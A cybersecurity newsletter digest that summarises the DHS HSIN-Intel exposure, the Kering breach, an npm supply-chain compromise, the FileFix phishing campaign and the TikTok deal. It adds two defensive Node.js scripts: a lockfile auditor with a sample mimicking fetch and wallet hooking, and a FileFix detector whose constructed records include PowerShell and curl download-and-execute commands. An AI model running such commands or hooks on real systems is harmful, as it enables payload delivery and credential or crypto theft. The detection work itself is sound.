DHS Misconfiguration Exposes Surveillance Data to Thousands of Unauthorized Users
From March to May 2023, a coding error on the Department of Homeland Security's HSIN-Intel platform, a system for sharing sensitive but unclassified intelligence among DHS, the FBI, NCTC, fusion centers, and local law enforcement, set the access permissions on intelligence products to "everyone". The misconfiguration exposed 439 intelligence "products" to 1,525 unauthorized views; the viewers included 518 private-sector users and 46 foreign nationals. The material included surveillance of domestic protests (e.g., Stop Cop City), reporting on foreign-state cyber operations, and tips and leads. Nearly 40% of the accessed material concerned cybersecurity. A permissions bug that fails open like this stays invisible unless someone is routinely comparing who can see a product with who should, and two months of exposure suggests nobody was.
Although DHS's Office of Privacy initially assessed the breach as low-impact, the memo's anonymous author disagreed, citing the exposure of Americans' personally identifiable information and recommending retraining for I&A staff. Spencer Reynolds of the Brennan Center obtained the memo via FOIA, while EPIC's Jeramie Scott pointed to reduced oversight, noting the effective dismantling of DHS's Office for Civil Rights and Civil Liberties. DHS claimed no serious harm resulted; ODNI declined to comment. Pending legislation may restrict DHS surveillance, but it exempts sharing through HSIN-Intel.
Read: https://www.wired.com/story/a-dhs-data-hub-exposed-sensitive-intel-to-thousands-of-unauthorized-users/
Kering Suffers Data Breach Targeting Luxury Shoppers Amid Surge in High-End Cyberattacks
Shiny Hunters (the activity Google tracks as UNC6040) breached Kering in April, exfiltrating customer names, email addresses, phone numbers, postal addresses, and "Total Sales" figures from Balenciaga, Gucci, and Alexander McQueen, but no payment-card or government-ID details. Claiming 7.4 million unique email addresses, the attackers shared a sample with the BBC showing clients who had spent $30K to $86K, exactly the data that makes those customers attractive targets for follow-on fraud and phishing.
Kering discovered the breach in June, notified affected individuals privately, informed regulators, and made no public disclosure, which GDPR permits when affected people are contacted directly. Shiny Hunters claim they demanded a Bitcoin ransom; Kering denies any communication. The attackers reportedly got in through a compromised Salesforce account, the same route seen in this year's Cartier and Louis Vuitton breaches and in the employee-targeting social-engineering campaign against Salesforce customers that Google had warned about; Google itself was among the companies compromised. The UK's National Cyber Security Centre recommends that affected customers reset passwords, use unique credentials per site, and enable two-factor authentication. Kering says its IT systems have since been secured.
Read: https://www.bbc.com/news/articles/crl5j8ld615o
Phishing Breach Exposes Fragility of the JavaScript Ecosystem
Aikido Security disclosed the largest npm supply chain compromise to date, triggered by a phishing email impersonating npm support. A single maintainer was duped into handing over his credentials and two-factor code, which let the attackers publish malicious versions of 18 high-traffic packages, chalk, debug, and duckdb among them. The injected code in each package's index.js hooked fetch, XMLHttpRequest, and the window.ethereum wallet provider in the browser to hijack cryptocurrency transactions. Although it was detected within minutes, these packages are so widely depended on that the compromised versions were downloaded millions of times before removal. The payload earned the attackers a trivial haul, 5 cents of ETH and $20 in memecoin, but set off global remediation: lockfile audits, compliance paperwork, and security sweeps.
The incident highlights how attackers, including APTs like Lazarus, increasingly exploit single points of failure in open-source ecosystems for mass reach; here the single point was one maintainer's account. Registries like PyPI, RubyGems, and Maven Central share the same structural weakness. Suggested reforms include phishing-resistant hardware keys for maintainers, anomaly detection on publishes, SBOM adoption so consumers can find affected dependencies quickly, and treating malicious-package publications with the urgency of zero-days. The breach was contained quickly; the structural risk remains.
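The remediation sweep the item mentions comes down to two questions: do any of my lockfiles pin a compromised version, and does any installed source carry the browser-API hooking the malicious index.js files used? The Node.js script below is an added example written for this newsletter, not code from Aikido or from any of the affected packages. The denylist entries are illustrative assumptions to be replaced with the published advisory's list, the lockfile and source snippets are constructed, and the hook indicators are heuristics that a legitimate fetch polyfill or wallet library will also trigger.

```javascript
// Added example (not from the page, Aikido, or the affected packages): audit an npm
// lockfile for known-compromised versions and grep sources for fetch/XHR/wallet hooking.

// Illustrative denylist (assumption, not an authoritative list): name -> bad versions.
// Populate it from the advisory for a real sweep.
const COMPROMISED = new Map([
  ["chalk", new Set(["5.6.1"])],
  ["debug", new Set(["4.4.2"])],
]);

// Walk the "packages" map of a lockfileVersion 2/3 package-lock.json.
// Keys look like "node_modules/chalk" or "node_modules/a/node_modules/@scope/pkg";
// the package name is everything after the last "node_modules/", so nested and
// scoped installs are handled the same way.
function scanLockfile(lock, denylist = COMPROMISED) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "") continue; // the root project itself
    const i = path.lastIndexOf("node_modules/");
    const name = i === -1 ? path : path.slice(i + "node_modules/".length);
    const bad = denylist.get(name);
    if (bad && bad.has(entry.version)) findings.push({ name, version: entry.version, path });
  }
  return findings;
}

// Source-level indicators of the technique: replacing the global fetch, patching
// XMLHttpRequest's prototype, or touching the injected wallet provider.
// Heuristic only; review every match by hand.
const HOOK_INDICATORS = [
  /\b(window|globalThis|self)\.fetch\s*=/,
  /XMLHttpRequest\.prototype\.(open|send)\s*=/,
  /\bwindow\.ethereum\b/,
];

function findHookIndicators(source) {
  return HOOK_INDICATORS.filter((re) => re.test(source)).map((re) => re.source);
}

// Constructed sample inputs so the script runs offline.
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/chalk": { version: "5.6.1" },
    "node_modules/debug": { version: "4.3.7" },
    "node_modules/supports-color/node_modules/debug": { version: "4.4.2" },
    "node_modules/@scope/harmless": { version: "0.1.0" },
  },
};

// Constructed stand-in for an altered index.js; it mimics the shape, not the real payload.
const SAMPLE_SUSPICIOUS_SRC = `
const _fetch = window.fetch;
window.fetch = async (...args) => { /* rewrite 0x... addresses in the body */ return _fetch(...args); };
const _open = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function () { return _open.apply(this, arguments); };
if (window.ethereum) { /* wrap request() to swap recipient addresses */ }
`;

const SAMPLE_BENIGN_SRC = "module.exports = (s) => s.toUpperCase();";

console.log("lockfile findings:", scanLockfile(SAMPLE_LOCK));
console.log("hook indicators:", findHookIndicators(SAMPLE_SUSPICIOUS_SRC));
```

On a real tree, feed `scanLockfile` the parsed package-lock.json (npm v7+ writes the `packages` map) and run `findHookIndicators` over `index.js` of every installed package; the lockfile scan is exact but only as good as the denylist, while the source scan catches a tampered file whose version never made the list at the cost of false positives.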
Read: https://cyberscoop.com/npm-supply-chain-compromise-brian-fox-sonatype-op-ed/
FileFix Exploit Spreads Globally Through AI Images and Facebook Phishing
In under three months, mr.d0x's FileFix, an evolution of ClickFix, has gone from proof-of-concept to the centerpiece of a sophisticated phishing campaign observed by Acronis researchers. Where ClickFix has the victim paste into the Run dialog, FileFix abuses the Windows Explorer address bar: the lure opens a file-upload dialog and tells the user to paste a "file path" into it, but the page has already loaded the clipboard with a PowerShell command, usually while the user is "appealing" a fake Facebook account suspension. The campaign is localized in 16+ languages, spans the U.S., China, Germany, Peru, and beyond, and uses AI-generated JPGs that hide a second-stage payload via steganography. That payload downloads StealC, a commercial infostealer targeting browsers, crypto wallets, cloud apps, VPNs, and messaging platforms.
Victims see only a looping error message while their credentials are harvested in the background. The campaign's novelty, its speed (just "a couple of button presses"), and its use of a UI path that standard phishing-awareness training never covers give it legs. Acronis's Eliad Kimhy notes that FileFix sidesteps enterprise restrictions on the Run dialog, putting high-value targets within reach again: blocking the Run dialog is not the same as constraining what explorer.exe is allowed to launch.
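A command pasted into the Explorer address bar runs with explorer.exe as its parent process, which is the one trace FileFix leaves in ordinary process-creation telemetry. The Node.js detector below is an added example written for this newsletter, not Acronis's or mr.d0x's code. It runs over constructed Sysmon-Event-1-style records; the trailing "# C:\..." comment it looks for is the published proof-of-concept's trick for making the pasted command look like a path in the address bar, and the download URL in the sample is a reserved .invalid name.

```javascript
// Added example (not from the page or from Acronis): flag FileFix-style launches in
// constructed process-creation records shaped like Sysmon Event ID 1.
// Heuristic: a shell or script host whose parent is explorer.exe AND whose command line
// carries indicators of a pasted one-liner. A bare PowerShell opened from the Start menu
// also has explorer.exe as its parent, so the parent alone is far too noisy to alert on.
const SHELLS = new Set(["powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"]);

const CMDLINE_INDICATORS = [
  { re: /\s#\s*[a-z]:\\/i, why: "trailing '#' comment shaped like a file path (address-bar disguise)" },
  { re: /\b(iex|invoke-expression|iwr|invoke-webrequest|curl|wget|downloadstring)\b/i, why: "download-and-execute cradle" },
  { re: /-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}/i, why: "encoded command" },
  { re: /-(w|windowstyle)\s+hidden/i, why: "hidden window" },
  { re: /-(nop|noprofile)\b/i, why: "profile bypass" },
];

// Last path component, lower-cased, for either slash style.
function basename(p) {
  return p.split(/[\\/]/).pop().toLowerCase();
}

function detectFileFix(events) {
  const hits = [];
  for (const ev of events) {
    if (!SHELLS.has(basename(ev.Image))) continue;
    if (basename(ev.ParentImage) !== "explorer.exe") continue;
    const reasons = CMDLINE_INDICATORS.filter((i) => i.re.test(ev.CommandLine)).map((i) => i.why);
    if (reasons.length === 0) continue; // explorer.exe parent alone is not enough
    hits.push({ pid: ev.ProcessId, user: ev.User, image: basename(ev.Image), reasons });
  }
  return hits;
}

// Constructed records (not real telemetry). String.raw keeps the Windows backslashes literal.
const PS_IMAGE = String.raw`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`;
const SAMPLE_EVENTS = [
  { // benign: user opened PowerShell from the Start menu
    ProcessId: 1001, User: "CORP\\alice", Image: PS_IMAGE,
    ParentImage: String.raw`C:\Windows\explorer.exe`,
    CommandLine: `"${PS_IMAGE}"`,
  },
  { // FileFix-shaped: pasted one-liner with a fake path hidden behind a comment
    ProcessId: 4242, User: "CORP\\alice", Image: PS_IMAGE,
    ParentImage: String.raw`C:\Windows\explorer.exe`,
    CommandLine: String.raw`powershell.exe -w hidden -c "iex (iwr 'http://example.invalid/p')" # C:\company\internal-secure\filedrive\HRPolicy.docx`,
  },
  { // suspicious but not FileFix: parent is cmd.exe, not Explorer
    ProcessId: 5150, User: "CORP\\bob", Image: String.raw`C:\Windows\System32\cmd.exe`,
    ParentImage: String.raw`C:\Windows\System32\cmd.exe`,
    CommandLine: String.raw`cmd.exe /c curl http://example.invalid/a -o a.exe`,
  },
];

console.log(detectFileFix(SAMPLE_EVENTS));
```

The third record is deliberately left unflagged: the rule is meant to catch the Explorer address-bar path specifically, and a separate rule should own download cradles under other parents. Tune the indicator list to your environment's admin tooling before alerting on it, and note that nothing in standard process telemetry shows the clipboard contents themselves.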
Read: https://www.darkreading.com/cyberattacks-data-breaches/innovative-filefix-attack-potent
Trump Delays TikTok Ban as US Consortium Eyes Control Without Algorithm
TikTok will not be banned this Wednesday: President Trump has extended ByteDance's divestment deadline to December 16. A deal, still in flux, would shift 80% ownership to a U.S. investor consortium including Oracle, Silver Lake, and Andreessen Horowitz, joined by existing ByteDance investors KKR, General Atlantic, and Susquehanna International, per WSJ. TikTok's new board would be American-dominated, with one U.S. government appointee. Trump expects a finalized deal in 30 to 45 days, per CNBC. However, China keeps the recommendation algorithm, licensing it to the U.S. venture, whose American engineers would have to re-create it. The FT notes that content would continue to flow between the U.S. and global apps, while China enforces export controls on the technology. Wang Jingtao of China's cybersecurity agency promised, vaguely, that ByteDance would "entrust" U.S. user data to U.S. entities. Senator Chuck Grassley and other Republicans have threatened to intervene if the deal does not comply with the Protecting Americans from Foreign Adversary Controlled Applications Act.
Read: https://arstechnica.com/tech-policy/2025/09/china-keeps-the-algorithm-critics-attack-trumps-tiktok-deal/
Napoleon! He wasn’t the first to think it, and far, far from the last.